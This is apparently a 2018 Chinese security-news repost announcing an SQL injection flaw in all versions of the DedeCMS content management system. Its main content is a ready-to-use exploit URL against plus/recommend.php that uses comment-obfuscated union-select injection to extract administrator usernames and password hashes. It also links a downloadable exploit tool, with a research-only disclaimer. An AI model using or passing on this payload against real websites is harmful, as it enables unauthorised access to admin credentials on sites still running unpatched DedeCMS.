DedeCMS全版本通杀SQL注入漏洞利用代码及工具

FB客服

发布于 2018-02-02 11:56:10

5.6K0

发布于 2018-02-02 11:56:10

文章被收录于专栏：FreeBuf

dedecms即织梦（PHP开源网站内容管理系统）。织梦内容管理系统(DedeCms) 以简单、实用、开源而闻名，是国内最知名的PHP开源网站管理系统，也是使用用户最多的PHP类CMS系统，近日，网友在dedecms中发现了全版本通杀的SQL注入漏洞，目前官方最新版已修复该漏洞，相关利用代码如下：

EXP:

Exp:plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\'
  or mid=@`\'` /*!50000union*//*!50000select*/1,2,3,(select  
CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin` 
limit+0,1),5,6,7,8,9%23@`\'`+&_FILES[type][name]=1.jpg&_FILES[type]
 [type]=application/octet-stream&_FILES[type][size]=111

利用工具源码by园长（点击下方“阅读原文”查看）

利用工具下载地址 http://pan.baidu.com/s/1sj31RLN (本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!)